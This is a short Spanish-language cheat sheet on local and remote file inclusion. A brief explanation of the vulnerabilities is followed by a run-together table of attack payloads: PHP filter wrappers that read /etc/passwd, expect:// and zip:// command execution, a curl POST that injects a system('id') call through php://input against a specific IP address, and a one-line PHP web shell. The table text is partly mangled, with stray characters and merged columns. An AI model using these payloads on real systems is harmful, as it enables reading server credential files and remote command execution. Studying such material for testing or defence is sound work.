Cheet Sheet LFI
La vulnerabilidad ‘Local File Inclusion’ permite a un atacante leer un archivo del servidor vulnerable, se produce debido a un error de programación de la pagina.
La inclusión de archivos locales (LFI) permite a un atacante incluir archivos en un servidor a través del navegador web. Esta vulnerabilidad existe cuando una aplicación web incluye un archivo sin desinfectar correctamente la entrada, lo que permite que un atacante manipule la entrada e inyecte caracteres transversales de ruta e incluya otros archivos del servidor web.
Remote File Inclusion, su traducción es Inclusión de Archivo Remota. Esta es una vulnerabilidad en la programación web. Puede ser una de las vulnerabilidades más críticas. Esta consiste en utilizar un código maligno almacenado en un host remoto y ejecutarlo en el servidor de la víctima
Command Description php://filter/read=convert.base64-encode/resource=/etc/passwdPHP filter to convert > file contents to Base64 php://filter/read=string.rot13/resource=/etc/passwdPHP filter to convert > file contents to ROT13 expect://idCommand execution with > PHP Expectwrappercurl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?> language=php://input"Using PHP Inputwrapper for command executionzip://malicious.zip%23exec.php&cmd=idCommand execution with the PHP Zipwrapper<?php system($_GET['cmd']); ?>PHP web shell file contents (i.e., shell.php)